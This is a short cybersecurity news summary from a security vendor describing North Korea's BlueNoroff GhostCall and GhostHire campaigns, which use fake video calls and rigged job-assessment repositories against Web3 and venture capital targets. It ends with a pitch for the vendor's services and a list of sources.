North Korean state-sponsored threat actors, operating under the umbrella of the Lazarus Group's BlueNoroff cluster, have launched sophisticated new cyber campaigns dubbed GhostCall and GhostHire. These operations specifically target executives and developers within the lucrative Web3, blockchain, and venture capital sectors, employing advanced social engineering tactics and multi-stage malware.

Key Takeaways

• BlueNoroff, a financially motivated group linked to North Korea, is behind the GhostCall and GhostHire campaigns.

• The campaigns target high-value individuals in the Web3, blockchain, and venture capital industries.

• GhostCall uses fake video calls to trick macOS users, while GhostHire lures developers with fraudulent job assessments.

• Advanced malware chains for both macOS and Windows are deployed, focusing on data exfiltration and system compromise.

• The use of generative AI is suspected to enhance the efficiency of these attacks.

GhostCall Campaign: Deceptive Video Calls

The GhostCall campaign primarily targets macOS users, particularly executives in tech and venture capital. Attackers initiate contact via platforms like Telegram, inviting potential victims to investment-related meetings. These meetings are simulated using pre-recorded videos of previous victims, creating a convincing illusion of a live call. Victims are then prompted to update their Zoom or Microsoft Teams client with a malicious script, disguised as a necessary update to resolve technical issues. This script initiates the infection chain, downloading ZIP files containing multi-component malware.

GhostHire Campaign: Malicious Job Assessments

In parallel, the GhostHire campaign targets Web3 developers. Threat actors pose as recruiters on Telegram, offering job opportunities and directing targets to download and execute a booby-trapped GitHub repository under the guise of a timed skill assessment. The urgency of the 30-minute deadline pressures victims into quickly running the malicious code. Once executed, the project identifies the victim's operating system and deploys an appropriate next-stage payload, such as DownTroy, written in PowerShell for Windows, bash for Linux, or AppleScript for macOS.

Advanced Malware and Data Exfiltration

Both campaigns deploy complex, multi-stage malware chains designed for extensive data exfiltration. These include sophisticated stealer suites and backdoors capable of harvesting sensitive information such as cryptocurrency wallet credentials, browser passwords, API keys for cloud services (including OpenAI), development environment secrets, and credentials from communication platforms. The malware is designed to bypass security measures and gain root privileges, enabling deep system compromise. Researchers note the actors' sustained effort to develop cross-platform malware and a unified command-and-control infrastructure, potentially accelerated by generative AI.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains, The Hacker News.

• Targets C-Suite and Managers with New Infiltration Methods, GBHackers News.

• BlueNoroff APT's Campaigns Target Web3, Venture Capital Sectors, TechNadu.